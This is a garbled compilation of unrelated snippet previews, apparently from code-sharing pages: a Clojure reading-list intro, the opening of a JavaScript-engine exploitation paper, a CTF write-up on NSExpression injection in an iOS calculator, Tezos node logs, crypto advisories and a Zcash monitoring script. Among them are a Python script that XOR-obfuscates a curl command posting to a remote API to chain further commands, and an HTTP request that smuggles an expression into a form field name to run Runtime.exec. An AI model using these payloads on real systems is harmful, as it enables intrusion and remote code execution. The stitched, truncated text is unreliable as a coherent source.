These resources (articles, books, and videos) are useful when you're starting to learn the language, or when you're learning a specific part of the language. This an opinionated list, no doubt. I've compiled this list from writing and teaching Clojure over the last 10 years.
| |=-----------------------------------------------------------------------=| | |
| |=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=| | |
| |=-----------------------------------------------------------------------=| | |
| |=------------------------------=[ saelo ]=------------------------------=| | |
| |=-----------------------------------------------------------------------=| | |
| The following are some brief notes about the changes that have taken place | |
| since the release of the "Attacking JavaScript Engines" paper [1]. In | |
| general, no big conceptional changes have happened since. Mitigations have | |
| been added to break some of the presented techniques and, as expected, a |
The challenge consisted of an iOS app (Calc.app) which implemented a simple calculator. Moreover, the app also registered a custom URL scheme (icalc://) which would simply evaluate the content of the URL. The calculator was implemented using NSExpressions and the input string would simply be parsed as such an expression and executed. NSExpressions are pretty powerful and allow for example calls to ObjC Methods (e.q. typing in sqrt(42) would end up calling +[_NSPredicateUtilities sqrt:@42]). Further, there are two interesting helper functions available in NSExpressions:
FUNCTION(obj, 'foo', "bar")
Which will result in a call of the method 'foo' on object obj with parameter "bar" (an NSString).
| Oct 31 22:46:21 - node.main: Starting the Tezos node... | |
| Oct 31 22:46:21 - node.main: Peer's global id: idteW9mJmHzq1jpq7nJLZrE2U5G4p7 | |
| Oct 31 22:46:21 - node.worker: bootstrapping chain... | |
| Oct 31 22:46:21 - p2p.io-scheduler: --> create | |
| Oct 31 22:46:21 - core: counter worker started | |
| Oct 31 22:46:21 - core: io_scheduler(write) worker started | |
| Oct 31 22:46:21 - core: io_scheduler(read) worker started | |
| Oct 31 22:46:21 - core: maintenance worker started | |
| Oct 31 22:46:21 - core: welcome worker started | |
| Oct 31 22:52:30 - core: db_request_scheduler worker started |
| from random import choices, seed | |
| from sys import argv | |
| payload = b'''curl -v -X POST -H 'Content-Type: application/json' -d '{command: "echo \\"place here another CURL to a server that will return a newly encoded cmd to tie the knot\\""}' https://yypnj3yzaa.execute-api.us-west-1.amazonaws.com/dev''' | |
| seed(argv[1]) | |
| obfuscation_key = choices(range(256), k=len(payload)) | |
| obfuscated_payload = [x ^ y for x, y in zip(payload, obfuscation_key)] |
| POST /users HTTP/1.1 | |
| Host: localhost:8080 | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 164 | |
| username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf |
Dr. Mark B Lundeberg, 2018 Feb 15
bitcoincash:qqy9myvyt7qffgye5a2mn2vn8ry95qm6asy40ptgx2
This security advisory notes a vulnerability in the common construction of cross-chain smart contracts (contracts between distinct cryptocurrencies) through hash locking. I focus on the primary use case in [atomic
This is a script written in Python intended to run alongside a Zcash node and export statistics for monitoring purposes. It assumes the existence of zcash-cli in the PATH and access to the RPC interface over localhost.
It tracks stuff like: block height, difficulty, number of peers, network solutions per second, errors, mempool size, size of recent blocks, number of transactions within blocks, chaintips, total bytes received and sent, transaction inputs and outputs, and the make-up of transactions in terms of JoinSplits, shielded, unshielded or mixed. These Zcash metrics are refreshed once every 2 minutes.
Prometheus is a monitoring system and time-series database.